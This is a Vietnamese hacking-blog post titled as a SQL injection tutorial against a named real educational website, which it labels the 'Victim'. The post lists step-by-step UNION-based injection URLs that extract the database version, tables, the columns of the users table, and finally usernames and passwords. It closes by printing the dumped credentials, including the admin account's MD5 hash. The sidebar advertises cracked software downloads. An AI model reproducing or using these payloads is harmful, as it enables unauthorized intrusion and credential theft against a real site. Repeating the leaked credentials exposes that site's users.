Mục Tiêu Doanh Nghiệp

Tin Tức

Total Pageviews

Thông tin công nghệ

Tags Cloud

Labels

Bài Viết nổi bật

[10][recent][slider-left][Bài Viết nổi bật]

Flexible Home Layout

Người đóng góp cho blog

Blog Archive

Dành cho quảng cáo

Dành cho quảng cáo

Sub Menu

Main Menu

Random post

Test Footer

Flickr Photo

Template information

Important

Contact Us

Tên

Email *

Thông báo *

728-banner

tin tuc

[4][tin tuc] [Tin Tức] [tin tức]

Danh Mục Sản Phẩm

Hình ảnh chủ đề của jangeltun. Được tạo bởi Blogger.

Popular Posts

Có gi hot?

Khi mọi thứ đều vuông

Khi mọi thứ đều vuông

Khi mọi thứ đều vuông

Google Chrome 33.0.1750.146

Google Chrome 33.0.1750.146

Google Chrome 33.0.1750.146

English Study Pro 2012 Full Key - Phần mềm học tiếng anh và luyện nghe hay nhất

English Study Pro 2012 Full Key - Phần mềm học tiếng anh và luyện nghe hay nhất

English Study Pro 2012 Full Key - Phần mềm học tiếng anh và luyện nghe hay nhất

Làm an toàn thông tin thì học gì?

Làm an toàn thông tin thì học gì?

Làm an toàn thông tin thì học gì?

PDF Hacks

PDF Hacks

PDF Hacks

CorelDRAW Graphics Suite X7 (Win32/64) + Crack (Keymaker-CORE)

CorelDRAW Graphics Suite X7 (Win32/64) + Crack (Keymaker-CORE)

CorelDRAW Graphics Suite X7 (Win32/64) + Crack (Keymaker-CORE)

Beginning JavaScript Charts

Beginning JavaScript Charts

Beginning JavaScript Charts

Biến USB thành "chìa khóa" để mở khóa đăng nhập Windows

Biến USB thành "chìa khóa" để mở khóa đăng nhập Windows

Biến USB thành "chìa khóa" để mở khóa đăng nhập Windows

CyberLink YouCam 6.0.2325 - Tạo hiệu ứng cực cool cho webcam

CyberLink YouCam 6.0.2325 - Tạo hiệu ứng cực cool cho webcam

CyberLink YouCam 6.0.2325 - Tạo hiệu ứng cực cool cho webcam

[Tut] SQL injection alphala.edu.vn

[Tut] SQL injection alphala.edu.vn

[Tut] SQL injection alphala.edu.vn

slide

[5][recent][slider-top-big][Slider Top]
You are here: Home / , [Tut] SQL injection alphala.edu.vn

[Tut] SQL injection alphala.edu.vn

| No comment
Victim : http://alphala.edu.vn
Những bước đầu anh em làm nhé. Bắt đầu làm từ bước Get version
Get version:
Mã:

http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,concat_ws(0x7c,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

Get table:
Mã:

http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

Get column của table users:
Mã:

http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x7573657273--

Get data column username, password:
Mã:

http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(username,0x7c,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from users--

Done - phund|1234,llvdemo|edb1beb699ca64802a3be86d9c90a19d,admin|21232f297a57a5a743894a0e4a801fc3